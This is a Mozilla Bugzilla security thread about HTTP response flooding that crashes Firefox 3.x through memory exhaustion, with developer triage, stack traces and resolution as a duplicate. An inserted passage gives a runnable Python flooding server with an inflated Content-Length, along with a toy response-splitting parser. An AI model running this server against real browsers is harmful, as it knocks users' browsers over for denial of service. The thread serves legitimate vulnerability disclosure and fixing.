Closed Bug 557545 Opened 14 years ago Closed 13 years ago

HTTP Response flooding causes XUL.dll to crash with possibility of remote code execution

Categories

(Core :: Networking: HTTP, defect)

x86
All
defect
Not set
critical

Tracking


RESOLVED DUPLICATE of bug 687256
Tracking Status
blocking2.0 --- -

People

(Reporter: saratg, Unassigned)

References

Details

(Whiteboard: [sg:moderate][critsmash:investigating][oom])

Attachments

(6 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1045 Safari/532.5
Build Identifier: Mozilla 3.0.* - 3.6.*

An attacker can flood the browser with HTTP response packets in response to a legitimate HTTP request. This takes advantage of HTTP keep-alive and falls under expected behavior. However, depending on the type of payload (response), the browser can be flooded with responses, resulting in a xul.dll crash, possibly due to data-segment corruption causing a read access violation.

The exact crash location varies with the type of payload and hence could possibly be manipulated to load a target location into the EAX register and invoke that memory address. Test Results:



Reproducible: Always

Steps to Reproduce:
1. Open a page vulnerable to http response flooding
2. Keep the page open for a few minutes
3. Browser crashes with xul.dll crash
Actual Results:  
Small payload: required about 1.2 million packets to crash the browser, approx. 2 minutes over a good network.

Large payload: required about 1300 packets to crash the browser.

Access violation - code c0000005 

The attack can be intensified using XSS, posting links on social networking sites, etc. The end user does not notice the response flooding when the packets are flooded into hidden iframes within a page.


Expected Results:  
Mozilla should ideally close the listening port or drop the connection when flooded with HTTP responses. This behavior can be observed in other browsers.

A web server is not required to generate the HTTP responses.
Sample code and a test payload can be provided if required.
Could you please attach the sample code and test case you mentioned, and/or provide a URL to one that's currently live?  Thanks!
The sample code, or a crash that was caused by it, will be required to do anything with this bug, I think. If the crash is caused by out-of-memory exceptions, that is considered a DoS attack and we can open up the bug. If you have crafted a response so that it causes a crash that isn't an out-of-memory failure, I'd really love to see what's going on.
Whiteboard: [sg:needinfo]
Attached file Test Html Page
Open the test.html file. Modify "localhost" in line 21 and replace it with the IP address or URL of the server where the Server.py script will be running.
Attached file Client Code
Open Client.py. Modify line 10 and replace the hardcoded location of test.html with the actual location of test.html on the test bed.
Attached file Flooding Server
Attached are the test code and payload used for testing. The payload is randomly chosen text. All scripts are written in Python. The script is a test case for response flooding using iframes.

Please follow instructions below to use the attached sample code:

1) Open the test.html file. Modify "localhost" in line 21 and replace it with the IP address or URL of the server where Server.py will be running. DO NOT REMOVE the "44445" port number after localhost.

2) Open Client.py. Modify line 10 and replace the hardcoded location of test.html with the actual location of test.html on the test bed.

3) Launch Server.py. The server listens on port 44445.

4) Launch Client.py. The client is hardcoded to run on port 44449.

5) Open Firefox and go to http://<ip>:44449/ .

6) Stay on the page displayed by the above URL for some time (the wait time depends on the network).

7) There is a live test server at http://tinyurl.com/ybkyp8l . However, this server won't be up for too long. The attached code is the same code that is deployed on the test server.

HTH
Whiteboard: [sg:needinfo] → [See Attachments]
Whiteboard: [See Attachments]
Assignee: nobody → sayrer
I let the testcase run in a trunk build in a Windows VM for several minutes but no crash.  sayrer, are you able to reproduce and confirm?  I'd love to get this bug assigned a severity, unhidden, or otherwise resolved.
I had set up a test server in the Midwest and used it to crash a browser on the West Coast a few days back. Though it took about 18-20 minutes on average, due to network connectivity, all test cases were able to reproduce the crash.

Let me know if I can be of any help in reproducing the issue.

~SG
Whiteboard: [sg:critical]
Whiteboard: [sg:critical] → [sg:critical][critsmash:investigating]
I got this to crash once, but I haven't been able to investigate yet.
Blocking 1.9.3 final as it's an sg:crit.
blocking2.0: --- → final+
Anyone run into this crash recently?
Still looking for a way to reproduce here.
This is not a normal crash but more of a crafted attack.
Please use the attached files and follow the instructions in comment 6 (https://bugzilla.mozilla.org/show_bug.cgi?id=557545#c6) to reproduce it.
Status: UNCONFIRMED → NEW
Ever confirmed: true
looking at this to see if i can get a stack etc
Whiteboard: [sg:critical][critsmash:investigating] → [sg:critical][critsmash:investigating][critsmash:cant-repro]
Reproduced on Firefox versions 3.6.8 & 3.6.3 using the same code attached to this bug.
Debug Info: "Access Violation when reading [00000008]"

Problem signature:
  Problem Event Name:	APPCRASH
  Application Name:	firefox.exe
  Application Version:	1.9.2.3855
  Application Timestamp:	4c48d5ce
  Fault Module Name:	xul.dll
  Fault Module Version:	1.9.2.3855
  Fault Module Timestamp:	4c48d532
  Exception Code:	c0000005
  Exception Offset:	000e825a
So far I was able to crash once on 3.6.8 and got http://crash-stats.mozilla.com/report/pending/69648e0d-a33c-4972-8efe-dc9192100831 - but it seems that Breakpad is not able to process/find this report (?)

Sarath, are you also able to crash on the Firefox 3.6.9 candidate builds (ftp://ftp.mozilla.org/pub/firefox/nightly/3.6.9-candidates/build1/)?

Maybe it would be helpful to get a stack via windbg (see https://developer.mozilla.org/en/how_to_get_a_stacktrace_with_windbg); will also try this next.
Reproduced on 3.6.9. Stack trace from windbg attached. 

PS: The port open/close logic could be the root cause of this issue. This crash is a result of flooding packets to the same port from which the request was made. Packet capture does not show any TCP FIN at any point until the browser crashes. The expected behavior, as seen in other browsers, would be to close the connection and open a new port for further traffic.
Attached file Stack trace
Sayrer will try to reproduce this on 3.6.9 as well.
Why is it crashing in our font routines if you're hammering on the network?
Assignee: sayrer → bsmith
I can reproduce this on 3.6.9 and on a recent trunk build. The crash is simpler/more reliable if you ignore Client.py and test.html:

1. python Server.py
2. go to http://<machine-name>:44445
3. wait.
4. If nothing happens after a few minutes, go to 2.

In a debug build, I observed the following assertions. The PushBack assertion is the most common:

###!!! ASSERTION: XPConnect is being called on a scope without a 'Components' property!: 'Error', file c:/Users/brian/Documents/mozilla-central/src/js/src/xpconnect/src/xpcwrappednativescope.cpp, line 795

###!!! ASSERTION: PushBack: 'Not Reached', file c:\users\brian\documents\mozilla-central\src\netwerk\protocol\http\nsHttpConnection.h, line 117
Reply to Daniel Veditz:

I'm not an expert on how the font routine works... but it does look like the font routine is trying to buffer every packet pushed through the open network connection and crashes when it can't handle any more. Maybe a buffer overflow caused by some race condition.

My 2 cents.
Should this move into Core::XPConnect based on comment 21?
Reporter: 

The content-length sent by the server doesn't match the actual length of the content. In this case, the given Content-Length is larger than the length of the content. Consequently, we parse one response which includes the HTTP headers of the following response. Then, we start to parse the next (pipelined) response in the middle of the document. This looks like a HTTP response without a response line or headers.

If we get a response from the server without an HTTP response line or HTTP headers, then we just read that response until the connection is closed, rendering the data as we download it. If the server keeps sending data then we will keep loading/rendering the content until we run out of memory. In 3.6.x we will crash; on my machine the crash has been happening usually in the cycle collector. (I will attach a minidump.) It looks like we realize we are running out of memory and run the cycle collector to free something up, but there is some bug in the cycle collector. In Minefield, mozalloc_abort kills the process.

Now, maybe my out-of-memory problem is masking the true issue that the user is trying to report. I did one time get a crash in code that was kind of similar to the stack trace the user reported. But, the minidump from crash reporter was empty. These empty minidumps seem to be generated when we run out of memory.

So, it seems like there are at least two issues: (1) We shouldn't attempt to retrieve and render gigantic/infinite documents, and (2) Some bug in the cycle collector or some heap corruption that causes the cycle collector to crash in low-memory situations.
This crash isn't the one in the cycle collector. It is in nsAttrAndChildArray::Compact. The call to PR_Realloc fails and we attempt to use mImpl when it is NULL:

    mImpl = static_cast<Impl*>(PR_Realloc(mImpl, (newSize + NS_IMPL_EXTRA_SIZE) * sizeof(nsIContent*)));
    NS_ASSERTION(mImpl, "failed to reallocate to smaller buffer");

    mImpl->mBufferSize = newSize;

Windows reports that the Firefox process is using 1.5GB of memory.

My guess is that many/most/all of the crashes are simply due to NULL pointers returned from malloc and friends.
So the realloc to a *smaller* size is failing in OOM conditions? That's suitably weird. I don't know whether that can be exploitable though.
Attached file Simplified Test Server
1. python Server.py
2. browse to http://<machine-name>:44445
3. Wait for FF to crash.
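The attached "Simplified Test Server" itself isn't reproduced in this report. As a rough sketch of what such a server might look like, based on the descriptions above (the port matches the attachment, but the payload, chunk size, and the inflated Content-Length value are illustrative assumptions, not the attachment's actual code):

```python
import socket

PORT = 44445                # port used by the attached Server.py
PAYLOAD = b"A" * 1024       # filler; the original payload was randomly chosen text

def build_response(claimed_length=10**9):
    """Build HTTP response headers whose Content-Length far exceeds
    any body the server will actually terminate."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Connection: keep-alive\r\n"
        f"Content-Length: {claimed_length}\r\n"
        "\r\n"
    ).encode("ascii")

def flood(conn, packets=None):
    """Send the oversized headers, then stream payload chunks until the
    peer disconnects (or for `packets` chunks, to keep runs bounded)."""
    conn.sendall(build_response())
    sent = 0
    while packets is None or sent < packets:
        conn.sendall(PAYLOAD)
        sent += 1
    return sent

def serve_forever():
    """Accept one connection at a time on PORT and flood it (run manually)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("", PORT))
        srv.listen(1)
        while True:
            conn, _ = srv.accept()
            conn.recv(4096)      # read and ignore the browser's request
            try:
                flood(conn)
            except OSError:
                pass             # peer closed the socket (or crashed)
            finally:
                conn.close()
```

Browsing to http://<machine-name>:44445 then makes the browser parse one response whose advertised length never arrives, so it keeps reading and rendering until memory runs out.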
Brian:

The HTTP Content-Length is a user-accessible and modifiable header. If an attacker can manipulate the Content-Length, in the scenario explained above, the browser keeps buffering infinite data until it crashes. Ideally, Content-Length or any user-accessible header should only be used as an indication of the size of the incoming response. If subsequent data/responses coming in through the socket are malformed and do not have the required HTTP headers, shouldn't the browser ideally drop the packets and close the socket as an indication of an anomaly?

I haven't confirmed it, but a thought - what if an attacker specifies the Content-Length to be less than the data sent on the socket? Will the browser consider the subsequent stream a new HTTP response? Do we see any attack vectors here?

~SG
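As a thought experiment on that last question: a toy keep-alive parser (a deliberate simplification for illustration, not Necko's actual code) shows how an understated Content-Length turns the trailing bytes into a second, attacker-controlled "response":

```python
def split_keepalive(stream):
    """Naively split a keep-alive byte stream into (headers, body) pairs,
    trusting Content-Length -- a toy model of a browser-side parser."""
    responses = []
    while b"\r\n\r\n" in stream:
        head, _, rest = stream.partition(b"\r\n\r\n")
        length = 0
        for line in head.split(b"\r\n"):
            if line.lower().startswith(b"content-length:"):
                length = int(line.split(b":", 1)[1])
        responses.append((head, rest[:length]))
        stream = rest[length:]   # leftover bytes become the "next" response
    return responses

# The server claims 5 bytes but sends 5 bytes plus a crafted second
# message: the overflow is parsed as a new response the server never
# legitimately sent (the classic response-splitting/smuggling shape).
wire = (b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\n"
        b"AAAAA"
        b"HTTP/1.1 200 OK\r\nContent-Length: 4\r\n\r\nEVIL")
```

Here `split_keepalive(wire)` yields two responses, the second one injected entirely via the length mismatch.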
Please ignore the "Reporter:" in my previous comment. I was typing a question to Sarath there but submitted before I finished it.

Sarath: I understand and agree. My question is this: Is there a particular reason why the test case you submitted was so complicated? I guessed that it was because you were using some fuzzing tool. But are you expecting anything other than the Content-Length to be problematic in this test case? In other words, did I over-simplify your test case?

I am not sure what the course of resolution should be. Presumably, we should do something to bail out of rendering/downloading gigantic documents. But, do we also need to go through and fix all the places where we crash when we run out of memory?
Brian: 

The only tools I used were the Python scripts that I attached; I was basically fuzzing the browser with those.

I believe one of my main areas of interest was the fact that the browser does not honor the Content-Length as it should. I vaguely remember a few anomalies w.r.t. the Content-Length that I had observed, but I do not have the complete data set and observations right now. That was why I posed the last point regarding a shorter Content-Length as a question (since I can't verify it with my current setup). If the short Content-Length is a possible attack, then we could be looking at a newer version of the CRLF attack or even an easier way to inject malware, redirect pages, etc. without user intervention (these are purely theoretical and I have not confirmed any manually).

I believe the crashes in XUL and other areas are definitely interesting but are more of a cascade effect of the main attack point.

From a threat modeling perspective, I would personally focus more on:

1) Correcting the logic used in handling/honoring user-manipulable headers and contents.

2) Also, I would personally look deeper into the behavior of the socket in case of anomalies (instances like malformed headers, a large number of response packets, etc.). In a number of browsers, I observed that (after an invalid Content-Length or after a specific number of packets) the socket is closed to ensure that the server can't inject any more arbitrary packets. The socket could also be set to close after a timeout interval. One of the test cases focused on using a larger Content-Length so that the browser keeps waiting for content, then triggering a page refresh from the client side using a <meta> HTTP tag, and in response serving a new payload - typically anything malicious.

I haven't looked into the browser code and cannot comment on what the best resolution would be. Hope this helps give a better perspective on my attempts to break any assumptions that went into creating the network handler.

~SG
> (1) We shouldn't attempt to retrieve and render gigantic/infinite documents

How can you tell when you're dealing with one?  Multi-megabyte HTML files are not rare... (not common either, but not rare).

> So the realloc to a *smaller* size is failing in OOM conditions?

I suppose nothing prevents libc from returning a new buffer for realloc() to a smaller size....

The Content-Length thing is pretty much irrelevant to the problem at hand (and would probably be "fixed" by the currently proposed patch for bug 363109).
Whiteboard: [sg:critical][critsmash:investigating][critsmash:cant-repro] → [sg:critical][critsmash:investigating]
In 2.x we die if malloc fails, AFAICT. Why don't we do the same in 1.x? Otherwise, we would have to find all the places that could possibly crash due to malloc failing and fix them all individually. While reproducing this bug I found at least 3-4 such places without even trying, so I assume there are many more.

Otherwise, should this bug be about fixing all those individual crash points?

The strategy of loading content until we run out of memory and crash seems ungood, but I don't have a solution for it. Maybe in a multi-process world we can put a memory cap (e.g. 512MB) on each child process to make it more difficult to DoS the user's system using techniques like this.
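For illustration only, the per-child-process cap could be approximated on Unix with an address-space rlimit (sketched in Python; `RLIMIT_AS` is not available on Windows, and 512MB is just the figure from the comment, not a vetted limit):

```python
import resource

def cap_address_space(limit_bytes=512 * 1024 * 1024):
    """Cap this process's virtual address space (Unix only).  Once the
    cap is reached, further allocations fail (MemoryError in Python)
    instead of exhausting the whole machine -- roughly the containment
    suggested above for content child processes."""
    _, hard = resource.getrlimit(resource.RLIMIT_AS)
    resource.setrlimit(resource.RLIMIT_AS, (limit_bytes, hard))
```

A multi-process parent would apply this (or the setrlimit(2) equivalent) in each content child after fork, before loading untrusted content.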
> Why don't we do the same in 1.x?

Because the infrastructure for doing that is new.
Attachment #484081 - Attachment mime type: application/octet-stream → text/plain
AFAICT, FF 4.0 catches all of these in mozalloc_abort. There have been a few of these out-of-memory bugs filed against 3.6.x, and at the security meeting it was suggested that all of them should be handled by backporting infallible malloc to 1.9. I need to check with Dan and Jesse to see how that work is being organized.

If that is the strategy we take, then this bug is already fixed, AFAICT, for FF 4.0 and so it isn't a FF 4.0 blocker.
Whiteboard: [sg:critical][critsmash:investigating] → [sg:critical][critsmash:investigating][oom]
Strike comment 34. Not all memory allocations are infallible in 2.0.
Depends on: 427099
No longer depends on: 611123
The end results of this attack are not reliable, and it should be rated less than "critical" -- it's not something that could be used as a drive-by attack.

Many of the resulting crashes (most? all?) are really due to the large content rather than the network aspect, and could be reproduced using a small page that self-generates the content through DOM appends, innerHTML, or document.write().
Whiteboard: [sg:critical][critsmash:investigating][oom] → [sg:moderate][critsmash:investigating][oom]
bsmedberg says it's non-reproducible; I say it's in the wrong component.
Assignee: bsmith → nobody
blocking2.0: final+ → -
Component: Security → Networking: HTTP
Product: Firefox → Core
QA Contact: firefox → networking.http
I am going to resolve this as a duplicate of bug 687256 because (a) none of the crashes I experienced were actually in networking code, (b) there isn't anything we can do in networking to fix this bug, and (c) the fuzz testing I suggest in bug 687256 should find (many of) the exploitable bugs that are identifiable with these test cases.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → DUPLICATE
Group: core-security → core-security-release
Group: core-security-release